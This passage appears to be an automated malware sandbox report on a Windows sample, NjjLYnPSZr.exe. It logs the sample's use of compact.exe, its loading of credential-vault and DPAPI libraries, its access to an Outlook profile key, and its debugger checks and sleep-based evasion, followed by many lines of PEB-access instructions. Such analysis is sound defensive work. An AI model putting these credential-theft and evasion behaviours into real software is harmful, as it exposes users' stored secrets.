          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Section loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: ieframe.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: netapi32.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: wkscli.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: mlang.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: winsqlite3.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: vaultcli.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\compact.exe Section loaded: cryptbase.dll
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe Section loaded: wininet.dll
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe Section loaded: mswsock.dll
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe Section loaded: dnsapi.dll
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe Section loaded: iphlpapi.dll
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe Section loaded: fwpuclnt.dll
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\compact.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
          Source: C:\Windows\SysWOW64\compact.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: NjjLYnPSZr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: compact.pdbGCTL source: NjjLYnPSZr.exe, 00000000.00000003.1970894978.000000000091D000.00000004.00000020.00020000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000002.3604055024.0000000001108000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XFLTednCZUTqje.exe, 00000002.00000000.1894942549.0000000000B6E000.00000002.00000001.01000000.00000005.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3603415797.0000000000B6E000.00000002.00000001.01000000.00000005.sdmp
          Source: Binary string: wntdll.pdbUGP source: NjjLYnPSZr.exe, 00000000.00000002.1971204229.000000000118E000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1879483342.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1881085129.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000002.3604665421.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1972841113.0000000003633000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1971132275.0000000003487000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000002.3604665421.000000000397E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: NjjLYnPSZr.exe, NjjLYnPSZr.exe, 00000000.00000002.1971204229.000000000118E000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1879483342.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1881085129.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, compact.exe, compact.exe, 00000005.00000002.3604665421.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1972841113.0000000003633000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1971132275.0000000003487000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000002.3604665421.000000000397E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: compact.pdb source: NjjLYnPSZr.exe, 00000000.00000003.1970894978.000000000091D000.00000004.00000020.00020000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000002.3604055024.0000000001108000.00000004.00000020.00020000.00000000.sdmp
          Source: NjjLYnPSZr.exe Static PE information: section name: .text entropy: 7.995793913523369
          Source: C:\Windows\SysWOW64\compact.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
          Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_0106096E rdtsc 0_2_0106096E
          Source: C:\Windows\SysWOW64\compact.exe Window / User API: threadDelayed 934
          Source: C:\Windows\SysWOW64\compact.exe Window / User API: threadDelayed 9039
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe API coverage: 0.7 %
          Source: C:\Windows\SysWOW64\compact.exe API coverage: 2.6 %
          Source: C:\Windows\SysWOW64\compact.exe TID: 7936 Thread sleep count: 934 > 30
          Source: C:\Windows\SysWOW64\compact.exe TID: 7936 Thread sleep time: -1868000s >= -30000s
          Source: C:\Windows\SysWOW64\compact.exe TID: 7936 Thread sleep count: 9039 > 30
          Source: C:\Windows\SysWOW64\compact.exe TID: 7936 Thread sleep time: -18078000s >= -30000s
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe TID: 7952 Thread sleep time: -60000s >= -30000s
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe TID: 7952 Thread sleep time: -43500s >= -30000s
          Source: C:\Windows\SysWOW64\compact.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_030FC340 FindFirstFileW,FindNextFileW,FindClose, 5_2_030FC340
          Source: compact.exe, 00000005.00000002.3603499562.000000000321D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2269930168.000001D7E660C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: XFLTednCZUTqje.exe, 00000006.00000002.3604274339.000000000122F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\compact.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_0106096E rdtsc 0_2_0106096E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_00E07623 LdrLoadDll, 0_2_00E07623
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E1D0 mov eax, dword ptr fs:[00000030h]0_2_0109E1D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E1D0 mov ecx, dword ptr fs:[00000030h]0_2_0109E1D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E1D0 mov eax, dword ptr fs:[00000030h]0_2_0109E1D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E1D0 mov eax, dword ptr fs:[00000030h]0_2_0109E1D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F61E5 mov eax, dword ptr fs:[00000030h]0_2_010F61E5
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010501F8 mov eax, dword ptr fs:[00000030h]0_2_010501F8
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A4000 mov ecx, dword ptr fs:[00000030h]0_2_010A4000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E016 mov eax, dword ptr fs:[00000030h]0_2_0103E016
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E016 mov eax, dword ptr fs:[00000030h]0_2_0103E016
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E016 mov eax, dword ptr fs:[00000030h]0_2_0103E016
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E016 mov eax, dword ptr fs:[00000030h]0_2_0103E016
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101A020 mov eax, dword ptr fs:[00000030h]0_2_0101A020
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101C020 mov eax, dword ptr fs:[00000030h]0_2_0101C020
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B6030 mov eax, dword ptr fs:[00000030h]0_2_010B6030
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01022050 mov eax, dword ptr fs:[00000030h]0_2_01022050
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6050 mov eax, dword ptr fs:[00000030h]0_2_010A6050
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104C073 mov eax, dword ptr fs:[00000030h]0_2_0104C073
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102208A mov eax, dword ptr fs:[00000030h]0_2_0102208A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B80A8 mov eax, dword ptr fs:[00000030h]0_2_010B80A8
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E60B8 mov eax, dword ptr fs:[00000030h]0_2_010E60B8
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E60B8 mov ecx, dword ptr fs:[00000030h]0_2_010E60B8
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A20DE mov eax, dword ptr fs:[00000030h]0_2_010A20DE
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101A0E3 mov ecx, dword ptr fs:[00000030h]0_2_0101A0E3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A60E0 mov eax, dword ptr fs:[00000030h]0_2_010A60E0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010280E9 mov eax, dword ptr fs:[00000030h]0_2_010280E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101C0F0 mov eax, dword ptr fs:[00000030h]0_2_0101C0F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010620F0 mov ecx, dword ptr fs:[00000030h]0_2_010620F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A30B mov eax, dword ptr fs:[00000030h]0_2_0105A30B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A30B mov eax, dword ptr fs:[00000030h]0_2_0105A30B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A30B mov eax, dword ptr fs:[00000030h]0_2_0105A30B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101C310 mov ecx, dword ptr fs:[00000030h]0_2_0101C310
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01040310 mov ecx, dword ptr fs:[00000030h]0_2_01040310
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A035C mov eax, dword ptr fs:[00000030h]0_2_010A035C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A035C mov eax, dword ptr fs:[00000030h]0_2_010A035C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A035C mov eax, dword ptr fs:[00000030h]0_2_010A035C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A035C mov ecx, dword ptr fs:[00000030h]0_2_010A035C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A035C mov eax, dword ptr fs:[00000030h]0_2_010A035C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A035C mov eax, dword ptr fs:[00000030h]0_2_010A035C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EA352 mov eax, dword ptr fs:[00000030h]0_2_010EA352
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C8350 mov ecx, dword ptr fs:[00000030h]0_2_010C8350
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C437C mov eax, dword ptr fs:[00000030h]0_2_010C437C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101E388 mov eax, dword ptr fs:[00000030h]0_2_0101E388
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101E388 mov eax, dword ptr fs:[00000030h]0_2_0101E388
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101E388 mov eax, dword ptr fs:[00000030h]0_2_0101E388
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104438F mov eax, dword ptr fs:[00000030h]0_2_0104438F
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104438F mov eax, dword ptr fs:[00000030h]0_2_0104438F
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01018397 mov eax, dword ptr fs:[00000030h]0_2_01018397
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01018397 mov eax, dword ptr fs:[00000030h]0_2_01018397
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01018397 mov eax, dword ptr fs:[00000030h]0_2_01018397
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DC3CD mov eax, dword ptr fs:[00000030h]0_2_010DC3CD
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A3C0 mov eax, dword ptr fs:[00000030h]0_2_0102A3C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A3C0 mov eax, dword ptr fs:[00000030h]0_2_0102A3C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A3C0 mov eax, dword ptr fs:[00000030h]0_2_0102A3C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A3C0 mov eax, dword ptr fs:[00000030h]0_2_0102A3C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A3C0 mov eax, dword ptr fs:[00000030h]0_2_0102A3C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A3C0 mov eax, dword ptr fs:[00000030h]0_2_0102A3C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010283C0 mov eax, dword ptr fs:[00000030h]0_2_010283C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010283C0 mov eax, dword ptr fs:[00000030h]0_2_010283C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010283C0 mov eax, dword ptr fs:[00000030h]0_2_010283C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010283C0 mov eax, dword ptr fs:[00000030h]0_2_010283C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A63C0 mov eax, dword ptr fs:[00000030h]0_2_010A63C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE3DB mov eax, dword ptr fs:[00000030h]0_2_010CE3DB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE3DB mov eax, dword ptr fs:[00000030h]0_2_010CE3DB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE3DB mov ecx, dword ptr fs:[00000030h]0_2_010CE3DB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE3DB mov eax, dword ptr fs:[00000030h]0_2_010CE3DB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C43D4 mov eax, dword ptr fs:[00000030h]0_2_010C43D4
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C43D4 mov eax, dword ptr fs:[00000030h]0_2_010C43D4
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E3F0 mov eax, dword ptr fs:[00000030h]0_2_0103E3F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E3F0 mov eax, dword ptr fs:[00000030h]0_2_0103E3F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E3F0 mov eax, dword ptr fs:[00000030h]0_2_0103E3F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010563FF mov eax, dword ptr fs:[00000030h]0_2_010563FF
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101823B mov eax, dword ptr fs:[00000030h]0_2_0101823B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A8243 mov eax, dword ptr fs:[00000030h]0_2_010A8243
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A8243 mov ecx, dword ptr fs:[00000030h]0_2_010A8243
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101A250 mov eax, dword ptr fs:[00000030h]0_2_0101A250
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01026259 mov eax, dword ptr fs:[00000030h]0_2_01026259
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DA250 mov eax, dword ptr fs:[00000030h]0_2_010DA250
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DA250 mov eax, dword ptr fs:[00000030h]0_2_010DA250
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01024260 mov eax, dword ptr fs:[00000030h]0_2_01024260
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01024260 mov eax, dword ptr fs:[00000030h]0_2_01024260
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01024260 mov eax, dword ptr fs:[00000030h]0_2_01024260
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101826B mov eax, dword ptr fs:[00000030h]0_2_0101826B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E284 mov eax, dword ptr fs:[00000030h]0_2_0105E284
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E284 mov eax, dword ptr fs:[00000030h]0_2_0105E284
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A0283 mov eax, dword ptr fs:[00000030h]0_2_010A0283
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A0283 mov eax, dword ptr fs:[00000030h]0_2_010A0283
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A0283 mov eax, dword ptr fs:[00000030h]0_2_010A0283
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010302A0 mov eax, dword ptr fs:[00000030h]0_2_010302A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010302A0 mov eax, dword ptr fs:[00000030h]0_2_010302A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B62A0 mov eax, dword ptr fs:[00000030h]0_2_010B62A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B62A0 mov ecx, dword ptr fs:[00000030h]0_2_010B62A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B62A0 mov eax, dword ptr fs:[00000030h]0_2_010B62A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B62A0 mov eax, dword ptr fs:[00000030h]0_2_010B62A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B62A0 mov eax, dword ptr fs:[00000030h]0_2_010B62A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B62A0 mov eax, dword ptr fs:[00000030h]0_2_010B62A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A2C3 mov eax, dword ptr fs:[00000030h]0_2_0102A2C3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A2C3 mov eax, dword ptr fs:[00000030h]0_2_0102A2C3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A2C3 mov eax, dword ptr fs:[00000030h]0_2_0102A2C3
